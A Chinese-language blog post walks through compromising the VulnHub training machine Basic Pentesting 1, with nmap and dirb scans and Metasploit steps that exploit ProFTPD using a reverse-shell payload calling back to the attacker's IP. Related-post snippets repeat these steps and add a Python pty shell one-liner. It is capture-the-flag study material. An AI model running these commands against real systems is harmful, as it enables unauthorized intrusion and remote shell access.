BASIC PENTESTING: 1打靶渗透【附代码】(权限提升)

Kucei

于 2024-08-05 06:23:20 发布

阅读量94

点赞数 2

分类专栏：打靶日常文章标签：网络网络安全 web安全经验分享笔记学习

本文链接：https://blog.csdn.net/weixin_52487093/article/details/140916485

版权

打靶日常专栏收录该内容

15 篇文章 0 订阅

订阅专栏

靶机下载地址：

https://vulnhub.com/entry/basic-pentesting-1,216/#downloadhttps://vulnhub.com/entry/basic-pentesting-1,216/#download

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.43.0/24|grep -B 2 '08:00:27:C6:35:2E'

1.2. 端口扫描

nmap -p -A 192.168.43.173

1.3. 目录扫描

dirb http://192.168.43.173

1.4. 敏感信息收集

2. 权限提升

1.kali使用msfconsole查找漏洞

msfconsole

search ProFTPD

2.看到第16个符合版本

use 16
# 查看配置
options

3.配置各种需求

set rhosts 192.168.43.173 #配置rhosts、
set payload cmd/unix/reverse #设置payload
set lhost 192.168.43.178 #配置lhost
options #检查一下
run #执行

成功提权

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Kucei

关注关注

2
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
0
评论
BASIC PENTESTING: 1打靶渗透【附代码】(权限提升)

BASIC PENTESTING: 1打靶渗透【附代码】(权限提升)
复制链接

扫一扫

专栏目录

Pentesting:渗透测试工具和资源

03-28

渗透测试渗透测试工具和资源

cookiecutter-pentesting:脚手架渗透测试项目

03-31

渗透测试Cookiecutter 快速入门和简化笔测项目生成一个空的结构来容纳一个渗透测试项目中的关键数据和注释。免费软件：麻省理工学院文档： : 。目录地位特征要求安装用法发展欢迎捐款！首先阅读。 ...

参与评论您还未登录，请先登录后发表或查看评论

[Vulnhub] basic_pentesting_1

weixin_63231007的博客

07-01

583

靶机：192.168.236.133 访问试试，没有得到可用信息。获得了ftp服务的版本，想搜索一下该版本是否有可利用的漏洞的话，可用msfconsole 发现了一个该版本可利用漏洞使用use命令，输入序号即可，0 进入该漏洞 exploitshow options 看一下参数，一个是RHOSTS 一个是RPORT 通过set命令来设置一下地址和端口，set RHOSTS 192.168.236.133下一步设置payload：set payload cmd/unix/reverse 这个是反向连接的

Vulnhub靶场渗透-basic_pentesting_1

paidx0

09-22

642

前言靶机ip（192.168.110.134）攻击机ip（192.168.110.127）网络NAT模式这次的靶场比较简单，却绕了挺大弯的信息收集找到隐藏页简单翻了一下也没啥可以利用的东西，继续扫隐藏页目录找到一些看似有用其实没啥用的东西，比如WordPress的登录页，文件包含页这全都是误导，显然我被骗了，一直在爆破登录页和一个一个文件的看，文件数量太多了浪费很多时间正确解法重新回到nmap，这次不偷懒，更详细的扫描一下服务的版本号 nmap -A -v 192.168

靶机渗透测试：basic_pentesting_1靶机提权

x_13579的博客

04-13

763

靶场提权

basic_pentesting_1靶机渗透

weixin_64809022的博客

06-23

699

Python提权： python3 -c 'import pty;pty.spawn("/bin/bash")'

靶场练习第五天~vulnhub靶场之basic_pentesting_1

qq_57976347的博客

01-30

752

一、信息收集 1.主机发现（1）Netdiscover：专用的二层发现工具，拥有主动和被动发现两种方式具体操作如下，查看一下kali的ip 然后使用命令sudo netdiscover，发现了靶机的ip 2.端口扫描，服务识别（1)使用nmap -A 开放的端口以及靶场操作系统和版本的探测，使用方法：nmap -A 192.168.101.106 二、后渗透 1.根据服务版本搜索相关漏洞这里用到msfconsole，关于msfconsole介绍：msfconsole..

[Vulnhub] basic_pentesting 2

weixin_63231007的博客

07-12

691

目录信息搜集 S2-052漏洞利用 Hydra爆破jan密码(1) vim读取密码 (2) ssh公钥私钥获取身份登录凭据下载链接：Basic Pentesting: 2 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ipnetdiscover -i eth0 -r 192.168.1.0/24靶机ip ： 192.168.236.138nmap -A 192.168.236.138 扫描一下靶机的具体信息。收集靶场环境的服务和端口信息我们可以看见139和4...

【vulnhub靶场】basic_pentesting_2靶机提权

qq_46421742的博客

08-03

312

免责声明：本文属于个人笔记，仅用于学习，禁止使用于任何违法行为，任何违法行为与本人无关。

basic_pentesting_1靶机的信息收集技术和漏洞扫描技术学习运用

zyzy0512的博客

07-01

1033

打开kali输入ifconfig回车，如图1.1所示。

Tryhackme-Basic Pentesting

个人博客

09-14

308

Basic Pentesting 文章目录Basic PentestingTask1 Web App Testing and Privilege Escalation Task1 Web App Testing and Privilege Escalation 1.Deploy the machine and connect to our network 2.Find the services exposed by the machine 3.What is the name of the hidden

java收费钓鱼源码-pentesting:渗透测试

06-05

java收费直播源码令人敬畏的渗透测试一组很棒的渗透测试资源。是对计算机系统及其物理基础设施发起授权的模拟攻击以暴露潜在的安全弱点和漏洞的做法。您的贡献和建议是衷心的 :heart_suit: 欢迎。请查看更多详细...

pentesting:我每天进行笔试的其他资源。

05-01

渗透我的日常测试的其他资源...

java开发oa系统源码下载-advanced-pentesting:高级渗透测试班的笔记

06-05

java开发oa系统源码下载笔记空气--ng：（破解wifi）获取外部无线网络适配器。来自 Kali 盒子： airmon-ng start wlan0 #put the adapter in monitor mode airodump-ng #capture packets 从不同的终端同时执行...pa

未知攻焉知防：从攻击者视角看网络安全的“攻守之道”

科技云报道

08-01

336

基于独特的“动态安全+AI”技术思想，瑞数信息综合运用自动化攻击保护、0day防护、多源低频防护、多维度分层分级对抗等多种安全防护策略和手段，还推出瑞数WAAP超融合平台，支持WAF、Bots防护、0day攻击防护、应用DDoS防护、API安全防护等多项安全产品单独或联合部署，能够覆盖Web、移动App、H5、API及IoT全应用渠道，提供多层级的联动防御机制，令企业在各类复杂的环境中，都可以轻松实现应用安全一体化防御。其次，由于供应链数量众多，类型错综复杂，导致安全难以做到统一管理，供应链风险与日俱增。

网安科班精选！爱荷华大学教授的网络安全零基础入门教程！

互联网架构小马的博客

07-31

583

网络就像一把双刃剑，给我们的生活、交流、工作和发展带来了便利，但同时也给信息安全以及个人隐私带来了威胁。网络和信息安全问题不仅影响了网络的普及和应用，还关系到企国家、军队、企业的信息安全和社会的经济安全，让人又爱又恨。今天给大家分享的这份手册，主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全和安全的源头，通过分析网络漏洞、探测、攻击和减少攻击的方法，来研究不同的网络协议。

【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透（原创）